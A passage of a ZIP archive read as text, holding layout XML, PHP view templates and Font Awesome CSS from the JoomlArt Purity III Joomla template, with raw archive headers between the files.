                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="0">JHIDE</option>
                <option value="1">JSHOW</option>
            </field>

            <field name="show_description_image" type="list"
                   description="JGLOBAL_SHOW_CATEGORY_IMAGE_DESC"
                   label="JGLOBAL_SHOW_CATEGORY_IMAGE_LABEL"
                    >
                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="0">JHIDE</option>
                <option value="1">JSHOW</option>
            </field>

            <field name="show_navigation" type="list"
                   description="TPL_SHOW_NAVIGATION_DESC"
                   label="TPL_SHOW_NAVIGATION_LABEL"
                   default="1"
                    >
                <option value="0">JHIDE</option>
                <option value="1">JSHOW</option>
            </field>

            <field name="show_empty_group" type="list"
                   description="TPL_SHOW_EMPTY_GROUP_DESC"
                   label="TPL_SHOW_EMPTY_GROUP_LABEL"
                   default="0"
                    >
                <option value="0">JHIDE</option>
                <option value="1">JSHOW</option>
            </field>

            <field name="show_detail_in_popup" type="list"
                   description="TPL_SHOW_DETAIL_IN_POPUP_DESC"
                   label="TPL_SHOW_DETAIL_IN_POPUP_LABEL"
                   default="1"
                    >
                <option value="0">JNO</option>
                <option value="1">JYES</option>
            </field>

		</fieldset>
	</fields>
</metadata>
PKԜ�\�%K''7purity_iii/html/com_content/category/features-intro.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');

$items = $this->items;
?>
<div class="blog<?php echo $this->pageclass_sfx;?> features-intro">

	<?php if (!empty($items)) : ?>
		<?php foreach ($items as &$item) : ?>
			<?php
			$this->item = &$item;
			echo $this->loadTemplate('item');
			?>
		<?php endforeach; ?>
	<?php endif; ?>

</div>
PKԜ�\���#1#17purity_iii/html/com_content/category/features-intro.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metadata>
	<layout title="xLayout - Features Intro" option="COM_CONTENT_CATEGORY_VIEW_BLOG_OPTION">
		<help
			key = "JHELP_MENUS_MENU_ITEM_ARTICLE_CATEGORY_BLOG"
		/>
		<message>
			<![CDATA[COM_CONTENT_CATEGORY_VIEW_BLOG_DESC]]>
		</message>
	</layout>

	<!-- Add fields to the request variables for the layout. -->
	<fields name="request">
		<fieldset name="request"
		 >

			<field name="id" type="category"
				description="JGLOBAL_CHOOSE_CATEGORY_DESC"
				extension="com_content"
				label="JGLOBAL_CHOOSE_CATEGORY_LABEL"
				required="true"
			/>
		</fieldset>
	</fields>

	<!-- Add fields to the parameters object for the layout. -->
<fields name="params">
<fieldset name="basic" label="Basic">

    <field name="layout_type" type="hidden" default="blog"/>
    <field name="category_layout" type="hidden" default="_:features-intro"/>
    <field name="num_leading_articles" type="hidden" default="0"/>
    <field name="num_links" type="hidden" default="0"/>
    <field name="num_intro_articles" type="text"
           description="Number of items"
           label="# Items"
           size="3"
           default="12"
            />

    <field name="orderby_pri" type="list"
           description="JGLOBAL_CATEGORY_ORDER_DESC"
           label="JGLOBAL_CATEGORY_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="none">JGLOBAL_NO_ORDER</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="order">JGLOBAL_CATEGORY_MANAGER_ORDER</option>
    </field>

    <field name="orderby_sec" type="list"
           description="JGLOBAL_ARTICLE_ORDER_DESC"
           label="JGLOBAL_ARTICLE_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="front">COM_CONTENT_FEATURED_ORDER</option>
        <option value="rdate">JGLOBAL_MOST_RECENT_FIRST</option>
        <option value="date">JGLOBAL_OLDEST_FIRST</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="author">JGLOBAL_AUTHOR_ALPHABETICAL</option>
        <option value="rauthor">JGLOBAL_AUTHOR_REVERSE_ALPHABETICAL</option>
        <option value="hits">JGLOBAL_MOST_HITS</option>
        <option value="rhits">JGLOBAL_LEAST_HITS</option>
        <option value="order">JGLOBAL_ORDERING</option>
    </field>

    <field name="order_date" type="list"
           description="JGLOBAL_ORDERING_DATE_DESC"
           label="JGLOBAL_ORDERING_DATE_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="created">JGLOBAL_CREATED</option>
        <option value="modified">JGLOBAL_MODIFIED</option>
        <option value="published">JPUBLISHED</option>
    </field>


    <field name="article_layout" type="componentlayout"
                 label="Article Layout"
                 description="JFIELD_ALT_COMPONENT_LAYOUT_DESC"
                 useglobal="true"
                 extension="com_content" view="article"
                    />
    </fieldset>

    <fieldset name="article" label="COM_CONTENT_ATTRIBS_FIELDSET_LABEL">
        <field name="show_title" type="list"
               description="JGLOBAL_SHOW_TITLE_DESC"
               label="JGLOBAL_SHOW_TITLE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_titles" type="list"
               description="JGLOBAL_LINKED_TITLES_DESC"
               label="JGLOBAL_LINKED_TITLES_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_intro" type="list"
               description="JGLOBAL_SHOW_INTRO_DESC"
               label="JGLOBAL_SHOW_INTRO_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="info_block_position"
                type="list"
                default=""
                label="COM_CONTENT_FIELD_INFOBLOCK_POSITION_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">COM_CONTENT_FIELD_OPTION_ABOVE</option>
            <option value="1">COM_CONTENT_FIELD_OPTION_BELOW</option>
            <option value="2">COM_CONTENT_FIELD_OPTION_SPLIT</option>
        </field>

        <field name="show_category" type="list"
               description="JGLOBAL_SHOW_CATEGORY_DESC"
               label="JGLOBAL_SHOW_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_category" type="list"
               description="JGLOBAL_LINK_CATEGORY_DESC"
               label="JGLOBAL_LINK_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_parent_category" type="list"
               description="JGLOBAL_SHOW_PARENT_CATEGORY_DESC"
               label="JGLOBAL_SHOW_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_parent_category" type="list"
               description="JGLOBAL_LINK_PARENT_CATEGORY_DESC"
               label="JGLOBAL_LINK_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_author" type="list"
               description="JGLOBAL_SHOW_AUTHOR_DESC"
               label="JGLOBAL_SHOW_AUTHOR_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_author" type="list"
               label="JGLOBAL_LINK_AUTHOR_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNo</option>
            <option value="1">JYes</option>
        </field>

        <field name="show_create_date" type="list"
               description="JGLOBAL_SHOW_CREATE_DATE_DESC"
               label="JGLOBAL_SHOW_CREATE_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_modify_date" type="list"
               description="JGLOBAL_SHOW_MODIFY_DATE_DESC"
               label="JGLOBAL_SHOW_MODIFY_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_publish_date" type="list"
               description="JGLOBAL_SHOW_PUBLISH_DATE_DESC"
               label="JGLOBAL_SHOW_PUBLISH_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_item_navigation" type="list"
               description="JGLOBAL_SHOW_NAVIGATION_DESC"
               label="JGLOBAL_SHOW_NAVIGATION_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>


        <field
                name="show_vote" type="list"
                label="JGLOBAL_SHOW_VOTE_LABEL"
                description="JGLOBAL_SHOW_VOTE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option	value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore"
                type="list"
                description="JGLOBAL_SHOW_READMORE_DESC"
                label="JGLOBAL_SHOW_READMORE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore_title"
                type="list"
                label="JGLOBAL_SHOW_READMORE_TITLE_LABEL"
                description="JGLOBAL_SHOW_READMORE_TITLE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_icons" type="list"
               label="JGLOBAL_SHOW_ICONS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_print_icon" type="list"
               label="JGLOBAL_SHOW_PRINT_ICON_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_email_icon" type="list"
               label="JGLOBAL_Show_Email_Icon_Label">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_hits" type="list"
               label="JGLOBAL_SHOW_HITS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_noauth" type="list"
               description="JGLOBAL_SHOW_UNAUTH_LINKS_DESC"
               label="JGLOBAL_SHOW_UNAUTH_LINKS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

    </fieldset>

</fields>
</metadata>
PKԜ�\��-ɲ�1purity_iii/html/com_content/category/glossary.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

require_once T3_TEMPLATE_PATH . '/helper.php';

// get featured items
$app      = JFactory::getApplication();
$params   = $this->params;
$catid = $app->input->getInt('id');

$items = JATemplateHelper::getArticles($params, $catid, 0);
$groups = array();
$other = 'others';
for ($group = 'a'; $group < 'z'; $group++) {
	$groups[$group] = array();
}
$groups[$other] = array();

foreach ($items as $item) {
	$title = clean_special_chars ($item->title);
	$firstChar = strtolower($title[0]);

	if ($firstChar < 'a' || $firstChar > 'z') {
		$groups[$other][] = $item;
	} else {
		$groups[$firstChar][] = $item;
	}
}

/* clean special char to put it into alphabet list */
function clean_special_chars ($s, $d=false) {
	if($d) $s = utf8_decode( $s );

	$chars = array(
		'_' => '/`|´|\^|~|¨|ª|º|©|®/',
		'a' => '/à|á|ả|ạ|ã|â|ầ|ấ|ẩ|ậ|ẫ|ă|ằ|ắ|ẳ|ặ|ẵ|ä|å|æ/',
		'd' => '/đ/',
		'e' => '/è|é|ẻ|ẹ|ẽ|ê|ề|ế|ể|ệ|ễ|ë/',
		'i' => '/ì|í|ỉ|ị|ĩ|î|ï/',
		'o' => '/ò|ó|ỏ|ọ|õ|ô|ồ|ố|ổ|ộ|ỗ|ö|ø/',
		'u' => '/ù|ú|û|ũ|ü|ů|ủ|ụ|ư|ứ|ừ|ữ|ử|ự/',
		'A' => '/À|Á|Ả|Ạ|Ã|Â|Ầ|Ấ|Ẩ|Ậ|Ẫ|Ă|Ằ|Ắ|Ẳ|Ặ|Ẵ|Ä|Å|Æ/',
		'D' => '/Đ/',
		'E' => '/È|É|Ẻ|Ẹ|Ẽ|Ê|Ề|Ế|Ể|Ệ|Ễ|Ê|Ë/',
		'I' => '/Ì|Í|Ỉ|Ị|Ĩ|Î|Ï/',
		'O' => '/Ò|Ó|Ỏ|Ọ|Õ|Ô|Ồ|Ố|Ổ|Ộ|Ỗ|Ö|Ø/',
		'U' => '/Ù|Ú|Û|Ũ|Ü|Ů|Ủ|Ụ|Ư|Ứ|Ừ|Ữ|Ử|Ự/',
		'c' => '/ć|ĉ|ç/',
		'C' => '/Ć|Ĉ|Ç/',
		'n' => '/ñ/',
		'N' => '/Ñ/',
		'y' => '/ý|ỳ|ỷ|ỵ|ỹ|ŷ|ÿ/',
		'Y' => '/Ý|Ỳ|Ỷ|Ỵ|Ỹ|Ŷ|Ÿ/'
	);

	return preg_replace( $chars, array_keys( $chars ), $s );
}
?>


<?php if ($this->params->get('show_page_heading', 1)) : ?>
	<div class="page-header clearfix">
		<h1 class="page-title"><?php echo $this->escape($this->params->get('page_heading')); ?> </h1>
	</div>
<?php endif; ?>

<?php if ($this->params->get('show_category_title', 1) or $this->params->get('page_subheading')) : ?>
	<div class="page-subheader clearfix">
		<h2 class="page-subtitle"><?php echo $this->escape($this->params->get('page_subheading')); ?>
			<?php if ($this->params->get('show_category_title')) : ?>
				<?php echo $this->category->title;?>
			<?php endif; ?>
		</h2>
	</div>
<?php endif; ?>

<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc clearfix">
		<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
			<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
		<?php endif; ?>
		<?php if ($this->params->get('show_description') && $this->category->description) : ?>
			<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
		<?php endif; ?>
	</div>
<?php endif; ?>


<?php if ($params->get ('show_navigation', 1)) : ?>
	<div class="glossary-nav">
		<nav class="container">
			<ul class="nav nav-pills">
			<?php foreach ($groups as $group => $group_items): ?>
				<?php if (count ($group_items) || $params->get ('show_empty_group', 0)) : ?>
				<li><a href="#<?php echo $group ?>"><?php echo $group ?></a></li>
				<?php endif ?>
			<?php endforeach ?>
			</ul>
		</nav>
	</div>

	<script type="text/javascript">
		!function($) {
			$('.glossary-nav nav').affix({
				offset:{
					top: function(){
						return $('#t3-content').offset().top - $('#t3-mainnav').height();
					}
				}
			});
		} (jQuery);
	</script>
<?php endif ?>

<div class="glossary-items">
<?php foreach ($groups as $group=>$group_items) : ?>
	<?php if (count ($group_items) || $params->get ('show_empty_group', 0)) {
		$this->group = $group;
		$this->group_items = $group_items;
		echo $this->loadTemplate ('group');
	} ?>
<?php endforeach ?>
</div>

<?php if ($params->get('show_detail_in_popup', 1)): ?>
<!-- Modal -->
<div class="modal fade" id="glossary-detail" tabindex="-1" role="dialog" aria-labelledby="glossary-detail-label" aria-hidden="true">
	<div class="modal-dialog">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
				<h4 class="modal-title" id="glossary-detail-label">Modal title</h4>
			</div>
			<div class="modal-body">

			</div>
		</div><!-- /.modal-content -->
	</div><!-- /.modal-dialog -->
</div><!-- /.modal -->

<script type="text/javascript">
	!function ($) {
		// click to open popup
		var $a = $('.glossary-group-items ul li a');
		$a.click (function() {
			var url = this.href,
				label = this.innerHTML;
			// ajax to request content
			url += (/\?/.test(url) ? '&' : '?') + 'tmpl=component';
			$.ajax (url).done(function(data){
				$('#glossary-detail .modal-body').html($(data).find ('section.article-content'));
				$('#glossary-detail-label').html(label );
				$('#glossary-detail').modal ('show');
				console.log ($('.modal-content').height());
			});

			return false;
		})
	} (jQuery);
</script>
<?php endif ?>PKԜ�\�����/purity_iii/html/com_content/article/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::addIncludePath(T3_PATH . '/html/com_content');
JHtml::addIncludePath(dirname(dirname(__FILE__)));
require_once T3_TEMPLATE_PATH . '/helper.php';

// Create shortcuts to some parameters.
$params   = $this->item->params;
$images   = json_decode($this->item->images);
$urls     = json_decode($this->item->urls);
$canEdit  = $params->get('access-edit');
$user     = JFactory::getUser();
$info    = $params->get('info_block_position', 2);
$aInfo1 = ($params->get('show_publish_date') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author'));
$aInfo2 = ($params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_hits'));
$topInfo = ($aInfo1 && $info != 1) || ($aInfo2 && $info == 0);
$botInfo = ($aInfo1 && $info == 1) || ($aInfo2 && $info != 0);
$icons = $params->get('access-edit') || $params->get('show_print_icon') || $params->get('show_email_icon');
if(version_compare(JVERSION, '4', 'lt')){
	JHtml::_('behavior.caption');
}
JHtml::_('bootstrap.tooltip');
?>

<?php if ($this->params->get('show_page_heading', 1)) : ?>
	<div class="page-header clearfix">
		<h1 class="page-title"><?php echo $this->escape($this->params->get('page_heading')); ?></h1>
	</div>
<?php endif; ?>

<div class="item-page<?php echo $this->pageclass_sfx ?> clearfix">

<?php if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && $this->item->paginationrelative) : ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>

<!-- Article -->
<article>
	<meta itemprop="inLanguage" content="<?php echo ($this->item->language === '*') ? JFactory::getConfig()->get('language') : $this->item->language; ?>" />
	<meta itemprop="url" content="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid)) ?>" />

  <?php if ($params->get('show_title')) : ?>
    <?php echo JLayoutHelper::render('joomla.content.item_title', array('item' => $this->item, 'params' => $params, 'title-tag'=>'h1')); ?>
  <?php endif; ?>
  
  <?php // Content is generated by content plugin event "onContentAfterTitle" ?>
  <?php echo $this->item->event->afterDisplayTitle; ?>

  <!-- Aside -->
  <?php if ($topInfo || $icons) : ?>
  <aside class="article-aside clearfix">
    <?php if ($topInfo): ?>
      <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
    <?php endif; ?>
    
    <?php if ($icons): ?>
      <?php echo JLayoutHelper::render('joomla.content.icons', array('item' => $this->item, 'params' => $params, 'print' => $this->print)); ?>
    <?php endif; ?>
  </aside>  
  <?php endif; ?>
  <!-- //Aside -->

  <?php if (isset ($this->item->toc)) : ?>
    <?php echo $this->item->toc; ?>
  <?php endif; ?>

  <?php if ($params->get('show_tags', 1) && !empty($this->item->tags->itemTags)) : ?>
    <?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
    <?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
  <?php endif; ?>

  <?php echo $this->item->event->beforeDisplayContent; ?>

<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '0')) || ($params->get('urls_position') == '0' && empty($urls->urls_position))) || (empty($urls->urls_position) && (!$params->get('urls_position')))): ?>
	<?php echo $this->loadTemplate('links'); ?>
<?php endif; ?>

<?php if ($params->get('access-view')): ?>
  <?php echo JLayoutHelper::render('joomla.content.fulltext_image', array('item' => $this->item, 'params' => $params)); ?>

	<?php
	if (!empty($this->item->pagination) AND $this->item->pagination AND !$this->item->paginationposition AND !$this->item->paginationrelative):
		echo $this->item->pagination;
	endif;
	?>

	<section class="article-content clearfix">
		<?php echo $this->item->text; ?>
	</section>
  
  <!-- footer -->
  <?php if ($botInfo) : ?>
  <footer class="article-footer clearfix">
    <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
  </footer>
  <?php endif; ?>
  <!-- //footer -->

	<?php
	if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && !$this->item->paginationrelative): ?>
		<?php
		echo '<hr class="divider-vertical" />';
		echo $this->item->pagination;
		?>
	<?php endif; ?>

	<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '1')) || ($params->get('urls_position') == '1'))): ?>
		<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>

	<?php //optional teaser intro text for guests ?>
<?php elseif ($params->get('show_noauth') == true &&  $user->get('guest')) : ?>
	<?php echo $this->item->introtext; ?>
	<?php //Optional link to let them register to see the whole article. ?>
	<?php if ($params->get('show_readmore') && $this->item->fulltext != null) :
		$link1 = JRoute::_('index.php?option=com_users&view=login');
		$link = new JURI($link1);
		?>
		<section class="readmore">
			<a href="<?php echo $link; ?>" itemprop="url" class="register">
						<span>
						<?php $attribs = json_decode($this->item->attribs); ?>
						<?php
						if ($attribs->alternative_readmore == null) :
							echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
						elseif ($readmore = $attribs->alternative_readmore) :
							echo $readmore;
							if ($params->get('show_readmore_title', 0) != 0) :
								echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
							endif;
						elseif ($params->get('show_readmore_title', 0) == 0) :
							echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
						else :
							echo JText::_('COM_CONTENT_READ_MORE');
							echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
						endif; ?>
						</span>
			</a>
		</section>
	<?php endif; ?>
<?php endif; ?>
</article>
<!-- //Article -->

<?php if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && $this->item->paginationrelative): ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>
</div>

<?php JATemplateHelper::loadModules('after-content', 't3xhtml') ?>PKԜ�\�V�.purity_iii/html/com_content/article/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKԜ�\�#o,,,purity_iii/fonts/font-awesome/css/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PKԜ�\�ʼ&�&�2purity_iii/fonts/font-awesome/css/font-awesome.cssnu&1i�/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */
/* FONT PATH
 * -------------------------- */
@font-face {
  font-family: 'FontAwesome';
  src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');
  src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');
  font-weight: normal;
  font-style: normal;
}
.fa {
  display: inline-block;
  font: normal normal normal 14px/1 FontAwesome;
  font-size: inherit;
  text-rendering: auto;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
/* makes the font 33% larger relative to the icon container */
.fa-lg {
  font-size: 1.33333333em;
  line-height: 0.75em;
  vertical-align: -15%;
}
.fa-2x {
  font-size: 2em;
}
.fa-3x {
  font-size: 3em;
}
.fa-4x {
  font-size: 4em;
}
.fa-5x {
  font-size: 5em;
}
.fa-fw {
  width: 1.28571429em;
  text-align: center;
}
.fa-ul {
  padding-left: 0;
  margin-left: 2.14285714em;
  list-style-type: none;
}
.fa-ul > li {
  position: relative;
}
.fa-li {
  position: absolute;
  left: -2.14285714em;
  width: 2.14285714em;
  top: 0.14285714em;
  text-align: center;
}
.fa-li.fa-lg {
  left: -1.85714286em;
}
.fa-border {
  padding: .2em .25em .15em;
  border: solid 0.08em #eeeeee;
  border-radius: .1em;
}
.fa-pull-left {
  float: left;
}
.fa-pull-right {
  float: right;
}
.fa.fa-pull-left {
  margin-right: .3em;
}
.fa.fa-pull-right {
  margin-left: .3em;
}
/* Deprecated as of 4.4.0 */
.pull-right {
  float: right;
}
.pull-left {
  float: left;
}
.fa.pull-left {
  margin-right: .3em;
}
.fa.pull-right {
  margin-left: .3em;
}
.fa-spin {
  -webkit-animation: fa-spin 2s infinite linear;
  animation: fa-spin 2s infinite linear;
}
.fa-pulse {
  -webkit-animation: fa-spin 1s infinite steps(8);
  animation: fa-spin 1s infinite steps(8);
}
@-webkit-keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
    transform: rotate(359deg);
  }
}
@keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
    transform: rotate(359deg);
  }
}
.fa-rotate-90 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";
  -webkit-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  transform: rotate(90deg);
}
.fa-rotate-180 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";
  -webkit-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  transform: rotate(180deg);
}
.fa-rotate-270 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";
  -webkit-transform: rotate(270deg);
  -ms-transform: rotate(270deg);
  transform: rotate(270deg);
}
.fa-flip-horizontal {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";
  -webkit-transform: scale(-1, 1);
  -ms-transform: scale(-1, 1);
  transform: scale(-1, 1);
}
.fa-flip-vertical {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(1, -1);
  -ms-transform: scale(1, -1);
  transform: scale(1, -1);
}
:root .fa-rotate-90,
:root .fa-rotate-180,
:root .fa-rotate-270,
:root .fa-flip-horizontal,
:root .fa-flip-vertical {
  filter: none;
}
.fa-stack {
  position: relative;
  display: inline-block;
  width: 2em;
  height: 2em;
  line-height: 2em;
  vertical-align: middle;
}
.fa-stack-1x,
.fa-stack-2x {
  position: absolute;
  left: 0;
  width: 100%;
  text-align: center;
}
.fa-stack-1x {
  line-height: inherit;
}
.fa-stack-2x {
  font-size: 2em;
}
.fa-inverse {
  color: #ffffff;
}
/* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen
   readers do not read off random characters that represent icons */
.fa-glass:before {
  content: "\f000";
}
.fa-music:before {
  content: "\f001";
}
.fa-search:before {
  content: "\f002";
}
.fa-envelope-o:before {
  content: "\f003";
}
.fa-heart:before {
  content: "\f004";
}
.fa-star:before {
  content: "\f005";
}
.fa-star-o:before {
  content: "\f006";
}
.fa-user:before {
  content: "\f007";
}
.fa-film:before {
  content: "\f008";
}
.fa-th-large:before {
  content: "\f009";
}
.fa-th:before {
